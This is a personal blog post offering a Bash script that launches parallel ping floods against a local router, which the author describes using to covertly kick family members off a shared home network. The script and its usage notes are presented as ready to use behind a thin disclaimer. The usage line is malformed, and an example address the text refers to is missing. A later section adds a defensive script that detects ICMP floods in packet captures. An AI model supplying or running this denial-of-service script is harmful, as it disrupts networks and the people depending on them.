Shell Script for Launching a Local Denial-of-Service Attack

Disclaimer: The following article is written for entertainment and educational purposes only. Neither the script shown here nor any of the techniques involved are intended to be used in real life. Launching denial-of-service attacks is illegal and can get you in serious trouble. I do not condone or support any use of such hacking methods for anything other than pen-testing purposes.

Haven’t written anything about either pen-testing or Linux shell scripting recently, so I thought I’d share a neat script I wrote several years ago that I used to use quite frequently. Back when I was a young whippersnapper in my early twenties and living with my parents in a house with a crappy Internet connection, I used to fight endlessly with my family members over bandwidth. Not in the sense that I was arguing with them over it, but in the sense that I was launching covert attacks to kick them off the network so that I could get more bandwidth for myself. It could get annoying trying to connect to a site while someone else was hogging all the bandwidth by streaming video in another room, so I thought why not disrupt their connection so that I would be allowed through?

The following script works by launching a denial-of-service attack against the local router. It sends a timed ping flood which overloads the router and causes it to go temporarily offline, effectively kicking everyone else off the network. The script will wait for a certain duration and then stop the ping flood, and at this point you’ll be able to get a request through because you’ll be the only one on the network. I know ping flooding has been rendered largely obsolete by the introduction of better DDoS protection with services like CloudFlare, but the attack I devised should still work, because there is no DDoS protection built into small home routers.

The script looks like this (just remember that I don’t condone anyone using it IRL):

#!/usr/bin/env bash
# Local denial-of-service script

host="$1"
shift
declare -i npings=50
declare -i duration=5

# Set parameters:
while getopts ":n:t:" opt
do
        case $opt in
          n) let npings=$OPTARG;;
          t) let duration=$OPTARG;;
          \?) echo "Usage: source host [-n npings] [-t duration]" >&2;;
        esac
done

# Launch DoS attack:
for (( i=0; i<$npings; i++ ))
do
        ping "$host" > /dev/null &
done

# Wait and stop attack:
sleep $duration
killall ping

# Cleanup:
unset opt i host npings duration

To use the script, you would source it at the command line with a command like this:

$ source -n 50 -t 5

Then wait $duration seconds for the prompt to reappear, then do whatever you want to do on the network. ($host should ideally be the IP address of the local WiFi router; I just used a common default gateway address as an example. Since it’s a local IP address, you can’t actually use it to attack anyone on the Internet.)

I know I could have used the -c $duration option here, but if you were to actually use this in real life (which, again, I’m not suggesting anyone do) you would quickly discover a problem if this method is used, which is that you wouldn’t be alerted when the ping flood is finished, so you wouldn’t know the proper time to put your Internet request through. Using killall makes things easier, because you can just wait for the prompt to reappear.
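From the network owner's side, the traffic pattern described above (many parallel ping processes from one machine aimed at the gateway) is easy to spot in a packet capture. The following is an added example, not part of the original script: it counts ICMP echo requests per source per second in tcpdump-style text and reports sources above a threshold. The function names, the threshold of 10 per second and the sample addresses are assumptions made for illustration.

```shell
#!/usr/bin/env bash
# Added example: flag hosts that send ICMP echo requests faster than a threshold.
# Input:  tcpdump-style text lines on stdin (the format printed by `tcpdump -n icmp`).
# Output: "source HH:MM:SS count" for every (source, second) bucket over the limit.

detect_icmp_flood() {
    threshold="${1:-10}"    # assumed limit: echo requests per source per second
    awk -v limit="$threshold" '
        / IP / && /ICMP echo request/ {
            split($1, ts, ".")        # keep HH:MM:SS, drop fractional seconds
            count[$3 " " ts[1]]++     # $3 is the source address
        }
        END {
            for (k in count)
                if (count[k] > limit) print k, count[k]
        }' | sort
}

# Constructed sample capture: one host sends 50 echo requests within one second
# (what 50 parallel ping processes look like), another sends one ordinary ping.
sample_capture() {
    i=0
    while [ "$i" -lt 50 ]; do
        printf '12:00:01.%06d IP 192.168.1.23 > 192.168.1.1: ICMP echo request, id %d, seq 1, length 64\n' \
            "$((i * 1000))" "$((100 + i))"
        i=$((i + 1))
    done
    printf '12:00:01.500000 IP 192.168.1.40 > 192.168.1.1: ICMP echo request, id 7, seq 1, length 64\n'
    printf '12:00:01.500100 IP 192.168.1.1 > 192.168.1.40: ICMP echo reply, id 7, seq 1, length 64\n'
}

# Only the flooding host is reported; the single normal ping stays under the limit.
sample_capture | detect_icmp_flood 10
```

On a live network the function can be fed a bounded capture, for example the output of `tcpdump -n -c 1000 icmp`, since the counts are printed only once the input ends.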

Well, that’s about all for today. This article was a little shorter and less involved than what I usually do, but I think it was a good break from routine. Farewell and happy hacking!

